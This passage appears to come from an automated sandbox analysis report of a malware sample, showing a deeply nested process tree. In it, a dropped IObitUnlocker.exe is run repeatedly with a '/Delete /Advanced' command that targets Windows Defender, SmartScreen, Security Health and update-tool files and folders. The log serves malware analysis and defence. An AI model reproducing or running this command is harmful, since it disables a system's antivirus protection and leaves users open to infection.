Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6772
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10708
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:10492
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9956
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:10984
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8336
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:10248
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:11072
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
